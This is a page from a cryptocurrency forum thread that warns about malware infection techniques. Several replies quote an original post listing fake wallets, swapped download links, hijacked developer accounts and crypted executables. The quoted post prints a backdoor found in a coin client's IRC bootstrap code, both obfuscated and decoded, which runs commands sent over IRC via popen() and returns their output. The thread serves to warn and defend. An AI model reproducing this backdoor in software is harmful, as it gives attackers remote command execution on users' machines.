Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 24. (Read 837907 times)

newbie
Activity: 36
Merit: 0
Must be careful with that these days. I would also beware of small spammy scammy AirDrop ICOs.  All they have to do is offer you free coins and you need to create an address.  In order to do that you need to download their wallet software... be careful out there.
I should be careful. I received a cheat email the other day.
full member
Activity: 406
Merit: 106
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
legendary
Activity: 1894
Merit: 1001
pls, whats the best antivirus or anti malware or general security program or feature one can use ......

prevention is better than cure

think in layers of protection, because there is no universal panacia for malware

a hosts file manager, with blocklists installed

a VPN service is a very good thing to have, mine costs ~$30.00 per year

some kind of AV (i like clamwin, because it is free and just quietly works, but needs some attention)

spybot S&D does a gr8 job if you use it every day and it's free

malwarebytes is very effective additional protecton, $~50.00/year for the paid ver.

virtualize your browsing: use free software like virtualbox to run a 32 bit OS on your 64 bit system, and do all your online stuf from there  Wink

Abandon Wondows OS! win 10 is a total insult to anyone who respects the concept of liberty. linux is free to use and superior in most ways

newbie
Activity: 24
Merit: 0
I learned so much from this thread. Thank you for this post! Especially the tip on the AirDrop ICOs, which I had no idea about but participated in due to the free coins they offered
member
Activity: 350
Merit: 15
Yes, we must be very careful. Thanks for the tips. Security is a big issue here since lots of us are using hot wallet to trade on sometimes exotic platforms.
member
Activity: 350
Merit: 15
Must be careful with that these days. I would also beware of small spammy scammy AirDrop ICOs.  All they have to do is offer you free coins and you need to create an address.  In order to do that you need to download their wallet software... be careful out there.
newbie
Activity: 69
Merit: 0
pls, whats the best antivirus or anti malware or general security program or feature one can use ......

prevention is better than cure
sr. member
Activity: 578
Merit: 250
Thanks for this post, although it would take a very trained eye to be able to spot malicious code within source.   Even if it's open source, sometimes it can be very difficult as the author of the malicious code tries to insert it in a sneaky way that otherwise looks legitimate.
newbie
Activity: 4
Merit: 0
Very informative
newbie
Activity: 150
Merit: 0
As much as we like freebies we should be careful of the application we install on our systems expecially hack copy of an application because most of the hacker want valuable information back from us which will give to them not knowing. My first bitcoin wallet balance was emptied because i save the private key and password on my desktop by Zbot/Zeus trojan . I learnt my lesson in hard way
member
Activity: 117
Merit: 10
I appreciate very much this info, thanks a lot!! Wink
newbie
Activity: 28
Merit: 0
thanks, this is helpful
newbie
Activity: 12
Merit: 0
wow very much useful informations...we should be more cautious now specially downloading. thanks
newbie
Activity: 69
Merit: 0
wooow, this is really a lot to swallow in for a newbie like me
newbie
Activity: 28
Merit: 0
Thanks that is realy serious i mean coping links would do that we all should be careful
member
Activity: 736
Merit: 11
excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....
Not everything like that bro although everyone wants to get big profits with little effort but still there are many parties who are not tempted by doing a scam
full member
Activity: 490
Merit: 101
excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....
newbie
Activity: 42
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
what is the coins name can you please tell me and others so we don't fall for this
newbie
Activity: 56
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible thanks for sharing this
newbie
Activity: 42
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible thanks for sharing this
Pages:
Jump to: